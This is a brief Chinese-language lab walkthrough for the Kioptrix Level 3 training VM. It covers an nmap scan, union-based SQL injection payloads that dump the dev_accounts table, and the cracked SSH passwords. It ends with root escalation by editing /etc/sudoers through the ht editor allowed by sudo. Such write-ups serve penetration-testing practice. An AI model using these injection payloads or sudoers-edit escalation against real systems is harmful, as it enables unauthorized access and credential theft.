0x03 - Kioptrix Level 3 SQL 注入 + sudo 提权

扫描主机

nmap 192.168.1.131 -A -oA nmap-results/attack

PORT   STATE SERVICE VERSION       
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)           
| ssh-hostkey:                                                                
|   1024 30e3f6dc2e225d17ac460239ad71cb49 (DSA)                               
|_  2048 9a82e696e47ed6a6d74544cb19aaecdd (RSA)                               

80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)                                                                
|_http-title: Ligoat Security - Got Goat? Security ...                        
| http-cookie-flags:     
|   /:     
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch

访问80端口

存在sql注入

# 表名
?id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--+&sort=photoid#photos

# 列名
?id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--+&sort=photoid#photos

# 数据
?id=1 union select 1,group_concat(username,0x7e,password),3,4,5,6 from gallery.dev_accounts--+&sort=photoid#photos

# md5解密
dreg/0d3eccfb887aabd50f243b3f155c0f85
dreg/Mast3r
loneferret/5badcaf789d3d1d09794d8f021f40f0e
loneferret/starwars

因为是有ssh的，尝试用这两个账号去登录

提权

查看有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

登录另一个账号

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

发现可以使用高权限免密码的ht

# 配置好这个环境，才可以打开ht
export TERM=xterm-color

编辑/etc/sudoers文件

添加/bin/bash

# 提权
sudo bash